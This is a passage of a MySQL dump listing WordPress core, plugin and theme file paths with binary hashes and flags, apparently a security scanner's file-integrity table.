���0�\\�O&','wp-content/plugins/wordpress-seo/src/helpers/notification-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9�r�\\�C���O��','��`Bb�.��4+qiU-yT3o��Ũ�lJ�\n��','',0,'?'),('^�.�\Z��N��','wp-content/plugins/wp-cerber/assets/flags/gy.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u��a��;E��U��g','�dM=�ܬyp)�U0>}�!���+�0�;\"b�X','',0,'?'),('^��s���12�7�/','wp-content/themes/hitmag/inc/kirki/controls/views/generic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\rR�b��	O�s','P�\r�,Z3ƾT��H�ơU>�L�֏Yގ�','',0,'?'),('^�^\\Q��=(w��','wp-includes/js/imagesloaded.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':Vu+sf5�i����','����4H��1�Pc���)C6c�D�aHum\Z#cV','',0,'?'),('^�\r6&�ҖF;��oB','wp-content/plugins/wp-cerber/assets/tpicker/jquery.timepicker.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P%S�%<��?�\Z��\\','gO�:!��rh��ʀ6�\'wf��D���z�','',0,'?'),('_�\0��d �MP~��D','wp-includes/revision.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t�ܑc�yxɪ�Q�7k�','����h�l4�j�G�hNJ���*����`m��Ғ','',0,'?'),('_�k4�!*}��݄ ','wp-content/plugins/wordfence/vendor/composer/ClassLoader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����|%��*T*�`�','�����289v�u3�n	C2�s��va/�','',0,'?'),('_�Mc�SFQƴ\Z�b','wp-content/plugins/wp-smushit/app/assets/js/smush-sui.min.js.map',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Ǽ�O����VY{�s','�J�$�m�ħ߶��!�n���}ee.v�G','',0,'?'),('_*�⽞L�0�>\r','wp-includes/feed-rss2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��lN+�5	��O?','�@!�`C��*Me��z�j@	�@���L�jw�','',0,'?'),('_�#��U1p�GS�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/SipHash.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z���rt��w��(�e','�ҿD�I<�^�i2dW�]G�_�-+�A8�W','',0,'?'),('_I����U��(����','wp-content/plugins/wp-cerber/assets/flags/cy.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���J.k��\n&SK~��','\Z���0��L��Jt�> $�눊/g߯<���','',0,'?'),('_K۝�����ƨ�\nWB','wp-content/themes/hitmag/inc/kirki/modules/css/property/class-kirki-output-property-background-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�	#�w�}���.�h2�','��f5��ƻ���!���Z��B}*`�R�Pg�`','',0,'?'),('_Uc���\n��K�j�','wp-includes/wp-includes/random_compat/byte_safe_strings.php',0,'�[Bң�J�Ԉ�;','�[Bң�J�Ԉ�;',']�Q�˄=Pݵu�Q��{>ϐ���','',0,'?'),('_j��_��/���yӱ','wp-includes/load.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"ȡ@(�#\'�I���G','Z^פ�N$��TPc��J,��w:ŏ����Š�','',0,'?'),('_w�����\'�JS6','wp-includes/blocks/gallery/theme-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0S��U�\'��2dP�ڞ','��c\'��/D.h@���9~��#�7_�0?)�','',0,'?'),('_{�F�ZW�8�\"r�/�','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/psr7/src/Response.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'�����ͰȊ','�ô叨�����^y�2\nԣ��)�-rw赔E','',0,'?'),('_}�3�����X','wp-content/plugins/wp-fastest-cache/languages/wp-fastest-cache-fr_FR.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C}��ˊt�l��:���','��B>}�Fku�2��=}���p����\n','',0,'?'),('_~�[H ��y@x.+','wp-content/plugins/wordpress-seo/admin/class-yoast-network-settings-api.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�0:����)!�@I�','#����C ��j��8����Z�c�W�k:�$כ�\':','',0,'?'),('_���K�W�^�l�','wp-content/plugins/wp-cerber/assets/flags/xk.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\rQ���/�eȀ�,','�z\n�bW#EAp�R��@���0�K�!�X','',0,'?'),('_�KNe��1���H�','wp-content/themes/twentytwentythree/patterns/footer-default.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�|x����k�G�>ޭ�','���z~��x{���}9��.���ж�^(e�','',0,'?'),('_�8������D���','wp-content/plugins/wordpress-seo/admin/roles/class-role-manager-wp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+vY!e�\\��9h2�','�&a�=��s��g;�T�\"���U�O_CL3k*','',0,'?'),('_�I�F�}D\\wtjl','wp-content/themes/hitmag/inc/kirki/field/class-kirki-field-slider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1�Q)�N�\\e�!��','���d~;�@��4�eJ3����n�W\nd�\'g%T�\r','',0,'?'),('_��m�s�*�v\'��*','wp-content/plugins/wordpress-seo/src/presenters/admin/badge-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����VȝmQ��W{�','�\Z/OE,��p���8g\\���h\\\"��5','',0,'?'),('_�O�$^����5��','wp-content/plugins/wp-cerber/assets/ui-stack.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��#`LZ)�pd��','Ɉ���H���R�{(~\0*8���!�^�u�','',0,'?'),('_�>ƳM�>VT�[����','wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/sk.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l|�l�uky0�B�һ','�OՅ�;��Z�lZ�6����&���L� �Z','',0,'?'),('_�\0>Orm��e�m�','wp-includes/wp-includes/widgets/class-wp-widget-search.php',0,'��}��z�Ys��]�','��}��z�Ys��]�','H:�wn����n8V��9�\'�tLYƭBq����','',0,'?'),('_�|��T�M^���J','wp-includes/css/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ki���������Ͷt','��]�#&>:�,�	y	ز�0��\n\nr)Q/I�','',0,'?'),('_��4�3���=��','wp-includes/images/uploader-icons.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\\M�����m��','�p����+/������i��!Z�ţ6�m�','',0,'?'),('_� ��S\\����o>�','wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-wp-meta-seo.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�c�O�S�M��&��','2����d�c2�v����[������\\Ebj�','',0,'?'),('_�(�C���M6�9�','wp-admin/includes/class-wp-links-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I���\ZV��w\\r�Y�','&�Z����1�t@�+\0�]�F���&9e{;(]��','',0,'?'),('_����8}���?�','wp-includes/css/media-views-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t������5��f,Z','_�~l�UM���]�P��g��S�����:z�','',0,'?'),('_��s�ƚt�i���>�','wp-content/plugins/wordpress-seo/src/deprecated/frontend/schema/class-schema-organization.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Aݘ*�(8uȪ}�','���=CM�\r�A�^~�߿�b�i��s�ph�','',0,'?'),('_��2o���U���E6','wp-includes/blocks/query-pagination-next.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�(c���VX(�А���','6�F������H�O�ɀ*n�Uu��ٮ�ǐ6','',0,'?'),('`\0W����L��H�&','wp-includes/blocks/query-title/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']�l�¥ˀ����3','d\"Q�٥[�Rf?а-[1�����#x�r,md\r_','',0,'?'),('`�s�Jn!��O�rB','wp-content/plugins/wp-cerber/assets/flags/af.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8G�@F�{�.�?00','����$���\Z�^�v����H]Dj�ycF߼','',0,'?'),('`6˻0�ܮ�{�[+','wp-includes/wp-includes/images/smilies/icon_twisted.gif',0,'L��v[?��+*8��;�','L��v[?��+*8��;�','V�H�hK�����\n���p�����;.�&/E�','',0,'?'),('`��S�`NI�^G�','wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(�i@�G�g��0�p','G��<�/�14Ņ�L��5�������!','',0,'?'),('`\Z�������Q&�`4�','wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-headspace.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<�wQ�z3���1vl','�>\\=��so�&�������I�jK�','',0,'?'),('`%�ֽ�j��\'��P��','wp-admin/js/edit-comments.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','af�~g��2PZ���8','����	)%T�L?�����#-�.��Ʉ��','',0,'?'),('`*C;�?����PZvko','wp-content/plugins/wp-smushit/app/assets/images/plugins-defender-icon@2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s1��j����*��m��','9�!�@Z��:s����)�m�^Ϡ�i��','',0,'?'),('`,8Vi�4N������P�','wp-content/plugins/wordpress-seo/js/dist/languages/nl.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)���AG�v-�HX��','<��WL7�4����ͣ3���-��.YK��T���','',0,'?'),('`5�ƙy�5_P�XI�','wp-content/plugins/redirection/locale/redirection-zh_TW.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m\n�	cvh���S-�m','\\�O����%e������\'�wF��=��','',0,'?'),('`Bd3� C�j�3��n','wp-includes/blocks/verse/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','AX߁���`j�����','%_��ҷ74����w\'���G��&dr#��x�','',0,'?'),('`fJl�����\n��','wp-includes/wp-includes/js/plupload/wp-plupload.js',0,'K%A�};܃q:{��','K%A�};܃q:{��','+8k�����/S*15xB�L6R�P���4�5�','',0,'?'),('`��N2E�ᆴ��pC�','wp-admin/images/privacy.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P��o��%ф�C�u�','�!é�o�T���u5�HF���#&�H��h�V�~','',0,'?'),('`��\n���2����','wp-admin/css/code-editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���V��DBQVgF','w��86=�ݔ����2�\rD%V��E5�S�	�T�','',0,'?'),('`�[��$a��[�RO��','wp-content/plugins/redirection/models/importer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��o�&ۦ�\n�\0n.[',':�k��8�*��Ϸ\0qh���2��8B�h','',0,'?'),('`�u=|ԑ�z�hvٷ�','wp-content/plugins/wp-smushit/app/pages/class-dashboard.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��`�r,z��,p�[�','o(����.�IQ7���X��k�F92�ܛ�,UvD','',0,'?'),('`�ڃ�j���e�&��','wp-content/plugins/wordpress-seo/src/helpers/blocks-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]��=J��\0��\\�%','���Eb:�i8����Oet�\Zp��#�]%)','',0,'?'),('`��\'?��� �ݒ$�','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/promises/src/FulfilledPromise.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�80TY��J�5=��1','��MXM�,���X���c��Xͥmib��D�','',0,'?'),('`�a�(�g��\"��','wp-includes/js/dist/html-entities.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*ʆ��y�!�^�_�6�N','��W\n�\"�̰F���y��7��?Y��B\0��','',0,'?'),('`�c0���\\���3�','wp-content/plugins/wordfence/lib/Diff/SequenceMatcher.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	>�U6ƪg��v�f','R�&sX$6#���_��ν�J�|�b0�o','',0,'?'),('`�o�o�����Z�W8�`','wp-includes/js/dist/preferences.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'ƌ��%�WM�`�\ZDJ','�0�f�ų�6oϟ�s�AZ��m%�S�GN�T','',0,'?'),('`��Q&���V9zI�','wp-includes/wp-includes/images/wpspin-2x.gif',0,'mS������y\"C���','mS������y\"C���','��66S�X������6O}�4>�p�\"���\'1','',0,'?'),('`�4W�\r��ݚ[}�=�','wp-includes/wp-includes/css/wp-embed-template.css',0,')I+�w2�h���K\"�',')I+�w2�h���K\"�','�6&�}�ok��AM\Z> �|�F�6,e�t\rPq','',0,'?'),('`�C���7J\n���','wp-content/themes/hitmag/inc/kirki/core/class-kirki-field.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(����ȥ��l�','����\'\0շ��i����67�6,�ħ]�v[','',0,'?'),('`���;�\"�-���+~;','wp-includes/js/tinymce/plugins/media/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#@,�4dG��M','XHx����0�֍X�\Z���OG��|�{�F2','',0,'?'),('`�}+�6�L-q[��$','wp-includes/sodium_compat/src/Core32/Util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��1�`���0�����','�qƖ����%/�y�g�rwÛ�\r�LR>=Y','',0,'?'),('`�{{�X���~��ZJ','wp-content/plugins/wp-cerber/assets/flags/dz.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Z�Զ�y�z_w','i�S��;ݬ�Bo�k�:�-й)r�\0S\"d:$5Y','',0,'?'),('`��U�2���mdW','wp-includes/class-wp-customize-nav-menus.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','aH$8�-M��,#�E','HpC�\0W�K�]�KR��fE�: ����f','',0,'?'),('a�)6����ю�','wp-includes/js/plupload/moxie.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#C\r��5DZ�ǒ����','����I�9_/x�t5���(�.g�tT\Z}&���','',0,'?'),('a�����2���*s','wp-includes/wp-includes/css/dist/block-editor/style.min.css',0,'݁mz���O���ya*p','݁mz���O���ya*p','��&aX�\n��q�E�D������$3Gt���','',0,'?'),('a(�\0�\'~��u����W','wp-content/plugins/wordpress-seo/images/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','EЛ��O0��c���Ag3','��	蚠{�c�FJ�w��!}a���9�','',0,'?'),('a)�TMW�Oo��Q�|�','wp-admin/images/media-button.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����6@p�z^ye��','_\Z���SjזY ����V�Z��Gen�_','',0,'?'),('a\\c,I\"5T��#̋�','wp-admin/images/media-button-music.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4^&$o��uf&�','�wWd¼8P�F6�A����ܴ�to-��X\\��a$','',0,'?'),('a^��O�Z@&��\";','wp-includes/css/dist/block-library/elements-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X��ϡ���ɾX)�t�','����巐�\ZMޭz8o�\'< 3�~KSE�Tb��','',0,'?'),('agOIK�1އ.\n�gB�','wp-includes/blocks/navigation/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��������#;��M�','��Y��<�C�д>4\'/���>�S�|3�i}j','',0,'?'),('akJ�\Z���[�tx9BP','wp-includes/wp-includes/js/tinymce/plugins/colorpicker/plugin.min.js',0,'Ͷ���U裦�h�','Ͷ���U裦�h�','��ehӧ�&έ��A�3�+WTh��\n\Z)�?��','',0,'?'),('a�w�U��\ZTz�K�','wp-includes/blocks/post-excerpt/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0��)\0Ь�/o','F�+h���p��a�qÉ�Fb�A�3i�<��','',0,'?'),('a�����|�f6��{�','wp-includes/wp-includes/js/tinymce/plugins/wpdialogs/plugin.js',0,'�We⎆?��N��t','�We⎆?��N��t','n4��<��Fz������_�5��kig�','',0,'?'),('a���γo��q�\"�','wp-includes/wp-includes/http.php',0,'�-��X㑩��/��2','�-��X㑩��/��2','? *�~HxJF�z����h�mp�ǖ}����','',0,'?'),('a�� �r֐��ݼ���','wp-content/plugins/wp-smushit/app/views/dashboard/summary-meta-box.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';\Zm��z��ܬBt���','덉��\n�8�;~n�����c0q�e����','',0,'?'),('a�?��_�ˢ��6j��X','readme.html',0,'�S���([���m��','�S���([���m��','4L�rH>�+�;�ߓ���\0�#�+!�KUpz%/\"','',0,'?'),('a�J��r���&�-D�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Crypto32.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U��o��}S}���8.','�$��s�����?;f�Ġ=`\r�	��&��!','',0,'?'),('a����(m�EB�l�','wp-includes/media-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ș�s�\'[n�\"�4','�K�]1�<��h2��k��������','',0,'?'),('a�c�CH\r��=l@ĸ','wp-admin/plugin-editor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r�x,�l:��7�A��','õ��]*�;e\n��v�D��kk��C;s?9/�','',0,'?'),('a�ai�G����}��\Z �','wp-includes/rest-api/endpoints/class-wp-rest-attachments-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��v�{%���mt�R','���@�.:\'B	�N2����;,�Q\n(�$�1��','',0,'?'),('a�&S���T�\"�l�9','wp-content/plugins/wp-cerber/assets/inspector.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�zn�d���*k��P�j','�	�o���7Xv�o\ZC�D�j����p��','',0,'?'),('a�XʤG\'ɀn\r|t�N','wp-content/plugins/wordpress-seo/src/wrappers/wp-query-wrapper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=��}xg�_,gYF1\n','� \0=�HH��f�����q}g�1�q2_����0','',0,'?'),('a��5r���X��','wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/ja.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q���aM;5w�n9�}','��r����=	n��5o�+��VI��$7_','',0,'?'),('b�&ga\0���o��','wp-content/plugins/wp-cerber/assets/fonts/roboto/Roboto-Mono_500.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x��E@_*Fr�b-�w�','�=3�)n��r��l\\!H�0\0�Q���\'���w^','',0,'?'),('bc�W@ɉ�+_���','wp-content/plugins/wordpress-seo/vendor_prefixed/symfony/dependency-injection/Container.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?��U�E>A��n','%��7�Y(-��F�SMY�E�?���,��Ҩ�','',0,'?'),('b���P��v*��','wp-content/plugins/wp-smushit/_src/scss/modules/_webp.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���,��3̄yl6��_','R\\{��e����n�V������Qq�����','',0,'?'),('b�D�JD�J|��/�wk','wp-includes/wp-includes/js/tinymce/plugins/lists/plugin.js',0,')�r?�N�ぼI��q\'�',')�r?�N�ぼI��q\'�','%�=r������d��v\n��i�z�x�u��)3p','',0,'?'),('b*J{qd<�6Ui�q�','wp-includes/wp-includes/images/crystal/default.png',0,'A�>)*/��!�-�','A�>)*/��!�-�','���n$���_�u	�$Q3��E�׏r�|Jm�','',0,'?'),('b\"^c�.V(�z���q','wp-content/plugins/redirection/locale/redirection-es_MX.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���.Ԋ�҉臫��','�{��e�6U\r�Q��ddm��,\'C]wP\r\r\n','',0,'?'),('b8��ޡ&��I��','wp-includes/wp-includes/sodium_compat/namespaced/Compat.php',0,'A�i�k�/��j\rn�3','A�i�k�/��j\rn�3','1�\'����ջ.�O��}5�Afi�~��>�:}s','',0,'?'),('bDQԇ���p5�t�d�y','wp-includes/wp-includes/js/codemirror/htmlhint.js',0,'�2�|џ�G�MtP5��','�2�|џ�G�MtP5��','\0U[\0�M\'mCռ5��5k`����5�ё','',0,'?'),('bT��9W><�]y��Ue�','wp-includes/wp-includes/https-detection.php',0,'x�5\\�r���(�W','x�5\\�r���(�W','W�|�_`|\\��y{4�N���Vp����j[','',0,'?'),('bUND>�k���Gȸ��W','wp-content/plugins/wordpress-seo/inc/class-post-type.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i�.ƒ�l�5yi�','���;�H��;o*�̖P�lR�yR��1q','',0,'?'),('bY�,��ϥY�r۝�;�','wp-includes/js/crop/cropper.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ky5�ni*M(��','�ٸ�T��ޝO���wL��y=}�gTl������','',0,'?'),('bdB��դ��Z�O�','wp-content/plugins/redirection/database/schema/410.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�e^��&Q�C�O�','o�\"��+���?l��B��WSypۢ�X��e�l','',0,'?'),('b�E�#�vX�9Ư,','wp-content/plugins/wordpress-seo/images/error-icon.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��+9�U;1p�Ŀkt�[','�Zrg���6���J��v`�<�cěb���&','',0,'?'),('b�Kj�0C��X��Ss��','wp-content/plugins/wordpress-seo/css/dist/wpseo-dismissible-1851-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��l\'���/��sl>','��\\tYm\rC����g�z���a�~G>C���.','',0,'?'),('b���y�Ekֽ��','wp-content/plugins/disable-gutenberg/fonts/awesome/fontawesome-webfont.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`��6��U)�<�c',',���$�u;�鰮9C��W���y����ޖ','',0,'?'),('b��,\\8�#���','wp-includes/wp-includes/sodium_compat/namespaced/Core/ChaCha20/Ctx.php',0,'��SG��˺��F���','��SG��˺��F���','[�(��R�������$��2o���t�b��','',0,'?'),('b���f�wis�A\"V>�L','wp-includes/wp-includes/widgets/class-wp-widget-text.php',0,'��;���\r9!�5�P�','��;���\r9!�5�P�','Y����7%��Z�Gݠ\Z��ӊr�cI�ϸ','',0,'?'),('b���HzfW����gw�','wp-content/plugins/wordfence/lib/wfSchema.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O�@����	�|���O�','g�v����K%��oiS�7�.�]�siH��2:p','',0,'?'),('b�\r#9��a�$�wn��','wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-squirrly.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�s��|a*�e��3�_','WCA�@�?�u2,�S�*(mR���]|5���','',0,'?'),('b���Ҍ &�?�{','wp-includes/js/customize-loader.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ҟ��]��ʁ�C��','��B�;�Gl1y�Q��}]���8�H�','',0,'?'),('b�+ƴݟ�3�','wp-includes/customize/class-wp-customize-nav-menu-location-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��U!��s^�7�L',';��lϓ�b^�����0�(�@�L�#B��','',0,'?'),('b�I��P����G!��H','wp-content/plugins/wordpress-seo/js/dist/languages/ru.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���4����s\r��\\��','p�ۉYA�<|��p\\\rj�wm�F5��;��\\̕','',0,'?'),('b񪥲K�+x����wF','wp-admin/css/site-health.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��=Y��;���m~','�=��1�2dKη*Jc���N(}�j�d&If','',0,'?'),('c餟��(Ok1�!͂','wp-admin/privacy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S\0�	J/ؑ_s\r�','�o�qk��Lh�r�T�7A�G;��E����K�','',0,'?'),('c�.�K-��k3��d�','wp-content/plugins/wordpress-seo/admin/taxonomy/class-taxonomy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ձ���|,\'ط�t�','t�_!��� UFY��ʋ{\'�2�L��qk5','',0,'?'),('c�4L]�˞��Mc','wp-admin/includes/class-wp-post-comments-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2��aSYyl)�K�6','F_۰�G\ZO0�c��~��I�h��\nY;jƣ��','',0,'?'),('c‹���p	�PU3/�','wp-content/plugins/wordfence/modules/login-security/classes/model/request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&ܮM���,~/���r','F;���W]��&��z~o\'�/��q�+��','',0,'?'),('c%�;8�QVWƝdȇ�:','wp-includes/blocks/paragraph/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Jd���pn��2��!�','���=Bt�	��+~���‚m�5���*��','',0,'?'),('c&f�M\Z�>�/\n���','wp-includes/css/dist/block-library/elements.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X��ϡ���ɾX)�t�','����巐�\ZMޭz8o�\'< 3�~KSE�Tb��','',0,'?'),('c+=�υ��E���e','wp-content/plugins/redirection/locale/json/redirection-en_ZA.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m�u�I�\\� ɮ�s','19��Qs���&�l�ƨ.�*�\rn�>��0���','',0,'?'),('c,���[xޫ�3�\n�@','wp-includes/js/jquery/jquery.masonry.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��@`���&n|�}A��','�\\ۙ����	}M�g� �$�0� [���B','',0,'?'),('c42j���x�c��d','wp-includes/Requests/Session.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*�|;��UE�*��{Y','��^���	nt�\"V8�M@�H؟Q��[S$','',0,'?'),('c]$%y�F�e�}��W','wp-content/plugins/wp-fastest-cache/js/schedule.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')wܵ�#$yc�H�\"s','��|]��_Y��`�B��B�?Y�b҆zp�','',0,'?'),('ct�ש�X�پ�u�yv','wp-includes/blocks/image/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C��`x1{ưy/Pb��','G�PG=����8���\Z���U��;D~��N�','',0,'?'),('c�	�]�- ���tϠ','wp-includes/wp-includes/feed-atom-comments.php',0,'��\\�I�6bJ�i\"m��','��\\�I�6bJ�i\"m��','+.4�0�I�g�(��b��}���yтK��kb�5','',0,'?'),('c�Q��i�����Qv','wp-includes/css/dist/editor/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.�r���j�JT�','�vs���FޡG?R��N�GM�9��#�_A�ե:�','',0,'?'),('c��k���AH�dryyK','wp-content/plugins/all-in-one-wp-security-and-firewall/languages/all-in-one-wp-security-and-firewall-pt_BR.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4<�j�B?7tKV��l','Ñ�X��t�)�{%W�╨�p�%��`͎q%�','',0,'?'),('c�\Zj<�Fh���Q�%�','wp-includes/wp-includes/js/tinymce/utils/form_utils.js',0,'���l�U��T����Li','���l�U��T����Li','vL���us<*r�WҪ����.\0|�Rg����','',0,'?'),('c�Д��p����Ѐ�.','wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/fr.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��}A�b�br���+U','�6���b�彶��5�2�J�����)��<��','',0,'?'),('c�o+�d�3���I��','wp-content/themes/hitmag/css/font-awesome.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ĕeHix[��`!f�J�','����}��˹t$��)�ʦ��P��1��~܀��','',0,'?'),('c�c������gu���','wp-content/plugins/wordfence/vendor/geoip2/geoip2/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';��8e_�T��ƽW','ݬ�IS�P\"�a�� 7J�6�QSv���_��y�','',0,'?'),('c��[b]��ݽ�JF','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�I]�U��	X�g����','�T�Ϛ-�1 [�@./i󒶦�i��q��0�o','',0,'?'),('d��:w���O�І','wp-includes/ID3/getid3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=��|SF&3ʩ�t�','I�̙0��H��b�h�U|�$�\'Q9��w:�','',0,'?'),('dv�?���񢤺=#b�','wp-includes/wp-includes/ms-network.php',0,'����x�����3.�','����x�����3.�','ʸ]ST���ySo$�Vgv�\"-j!QGK���','',0,'?'),('d��1�쵓-�;O��','wp-admin/js/custom-background.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��P�A3�� K�}Û�$','4hN\n��:Q�qX�z!���iq�^sYĄ�,i�','',0,'?'),('d4c\r/-�\n���>��','wp-includes/blocks/post-date/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3����٦>�L�\'','����?��a�h����Ɩov���